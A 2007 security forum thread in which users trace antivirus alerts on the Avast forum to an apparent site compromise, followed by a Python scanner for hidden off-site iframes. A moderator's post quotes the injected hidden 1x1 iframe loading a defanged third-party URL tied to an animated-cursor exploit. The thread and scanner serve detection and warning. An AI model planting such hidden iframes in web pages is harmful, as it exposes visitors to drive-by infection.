Get this folks...

Discussion in 'malware problems & news' started by JeremyWW, Aug 24, 2007.

Thread Status:
Not open for further replies.
  1. JeremyWW

    JeremyWW Registered Member

    Joined:
    Apr 13, 2005
    Posts:
    237
    Alwil's credibility just hit the ground floor like an elevator with the wires cut...

    Go here and see what NOD32 does: h__p://forum.avast.com/
     
    Last edited by a moderator: Aug 24, 2007
  2. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    Hmm... surprising, yet common sense says FP.
     
    Last edited by a moderator: Aug 24, 2007
  3. JeremyWW

    JeremyWW Registered Member

    Joined:
    Apr 13, 2005
    Posts:
    237
    Possibly, BUT...Avast! itself picks it up...so their own signatures are picking it up on their own site!
     
    Last edited: Aug 24, 2007
  4. flyrfan111

    flyrfan111 Registered Member

    Joined:
    Jun 1, 2004
    Posts:
    1,224
    F-Prot flags it also. Starting to sound like a legit detection. It isn't on Avast's site though, you are getting redirected to Media Count. It only works in IE. FF and Opera don't get it, at least on my system.
     
  5. JeremyWW

    JeremyWW Registered Member

    Joined:
    Apr 13, 2005
    Posts:
    237
    Exactly, which is why I just uninstalled Avast!, wrote a fairly abrupt e-mail to their research team and came back here looking for sanity! I think I found it in the form of NOD32 AV Beta. I've been a long term NOD32 user and I've been waiting for this...at last...!!! :)
     
  6. flyrfan111

    flyrfan111 Registered Member

    Joined:
    Jun 1, 2004
    Posts:
    1,224
    Run an On Demand Scan and then look at your log.
     
  7. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    Oooer o_O

    This cannot be good. Picked up in Firefox and IE. If other AVs are picking it up then something is a bit fishy.
     
  8. JeremyWW

    JeremyWW Registered Member

    Joined:
    Apr 13, 2005
    Posts:
    237
    Doing it now...
     
  9. flyrfan111

    flyrfan111 Registered Member

    Joined:
    Jun 1, 2004
    Posts:
    1,224
    I only get it in IE, not in FF, perhaps that ad blocking plug in stops it.
     
  10. JeremyWW

    JeremyWW Registered Member

    Joined:
    Apr 13, 2005
    Posts:
    237
    In depth scan finished: Clean machine...
     
  11. flyrfan111

    flyrfan111 Registered Member

    Joined:
    Jun 1, 2004
    Posts:
    1,224

    Look at the log, do you have a bunch of "internal errors"?
     
  12. raven211

    raven211 Registered Member

    Joined:
    May 4, 2005
    Posts:
    2,567
    Haven't made a scan yet - might do it later, just to see if NOD32 picks something up in general. I got the warning/infection message in Opera though.
     
  13. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    I think the internal errors are only related to the new ESS/NOD32 AV beta. NOD 2.7 is running fine - no internal errors or anything like that here.
     
  14. JeremyWW

    JeremyWW Registered Member

    Joined:
    Apr 13, 2005
    Posts:
    237
    No. I'm looking for that specific string, yes? Nothing...

    OK...just one, but nothing to do with anything...

    24/08/2007 23:03:56 D:\APPS\INSTALL PACK\Microsoft\Powerpoint Hotfix\258563_intl_i386_zip.exe » ZIP » office2003-KB912022-GLB.exe - internal error
     
  15. LoneWolf

    LoneWolf Registered Member

    Joined:
    Jan 2, 2006
    Posts:
    3,367
    Noticed this earlier.
    Thought LSP was giving me a FP.
    Maybe not.
    Site may have been hacked o_O
    I know this has happened to other sites, forum and not, in the past.
    Can anyone else confirm this?
     


  16. flyrfan111

    flyrfan111 Registered Member

    Joined:
    Jun 1, 2004
    Posts:
    1,224
    Correct, 2.7 works like a charm.
     
  17. JeremyWW

    JeremyWW Registered Member

    Joined:
    Apr 13, 2005
    Posts:
    237
    Yup...
     


  18. flyrfan111

    flyrfan111 Registered Member

    Joined:
    Jun 1, 2004
    Posts:
    1,224
    I have thousands of them. 228 pages in a word document!!
     
  19. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    Hacking is looking quite likely here :doubt:
     
  20. flyrfan111

    flyrfan111 Registered Member

    Joined:
    Jun 1, 2004
    Posts:
    1,224
    Yup. Sure looks that way (More Likely). Or quite a few different AVs and Link Scanner are giving FPs (Less Likely).
     
  21. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    We'll alter the clickable links for the time being until it's determined what....IF anything is going on. We'll also caution any that wish to still visit the link.

    <iframe src='h__p://mediacount.net/strong/020sdsfg' width=1 height=1></iframe>

    Thanks
    Bubba
     
  22. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    I guess it is possible that it could be an FP. It is an ad/media link being flagged, so it may be the way that the Ad/link is implemented that appears malicious. Could happen. *shrugs*
     
  23. raven211

    raven211 Registered Member

    Joined:
    May 4, 2005
    Posts:
    2,567
    Hehe.. Just a bit funny though that many others detect it also then. :rolleyes:
     
  24. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    That's what I mean. It may be a suspicious implementation of something that is triggering the AV response. Of course, it may most likely be a real threat. Haven't seen one in months.

    Quite exciting to get a real alert for once...
     
    Last edited by a moderator: Aug 24, 2007
  25. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    It is a real threat at the moment due to the iframe code and link still available at Avast.

    Windows Animated Cursor Stack Overflow Vulnerability

    portion of the ani code from the mediacount.net/strong/020sdsfg/324123.htm link

    We have also moved this to a more appropriate forum so others that visit the Avast Forums can be made aware.

    Proceed with caution,
    Bubba
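
The injected markup quoted in post 21 is a 1x1 iframe that loads a third-party host, which is a pattern a site owner can scan their own served pages for. The following is an added example, not part of the original thread: the function names, the `MAX_PIXELS` threshold and every hostname in the sample are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

MAX_PIXELS = 2  # assumption: a frame this small in either dimension is invisible

def _pixels(value):
    """Parse a width/height attribute ('1', '1px'); None if absent or not a pixel count."""
    v = (value or "").strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    return int(v) if v.isdigit() else None

class HiddenFrameFinder(HTMLParser):
    """Collects iframes that are invisible and load from a host other than the page's own."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []  # (line number, frame host, src)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        # Exact host comparison: sibling subdomains count as off-site (simplification).
        off_site = bool(host) and host != self.page_host
        dims = (_pixels(a.get("width")), _pixels(a.get("height")))
        tiny = any(d is not None and d <= MAX_PIXELS for d in dims)
        style = a.get("style", "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        if off_site and (tiny or hidden):
            self.findings.append((self.getpos()[0], host, a["src"]))

def find_hidden_offsite_iframes(html, page_host):
    finder = HiddenFrameFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page; all hostnames are placeholders.
SAMPLE_PAGE = """<html><body>
<iframe src="/shoutbox.html" width="1" height="1"></iframe>
<iframe src="http://video.example.org/embed/42" width="560" height="315"></iframe>
<iframe src='http://counter.example.net/path/abc' width=1 height=1></iframe>
<iframe src="//cdn.example.net/t" style="display: none"></iframe>
</body></html>"""
if __name__ == "__main__":
    for line, host, src in find_hidden_offsite_iframes(SAMPLE_PAGE, "forum.example"):
        print(f"line {line}: hidden iframe -> {host} ({src})")
```

A hit is a lead for review rather than a verdict, since legitimate trackers also use invisible frames; the check is most useful when run against the page as served and compared with the templates in source control.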
     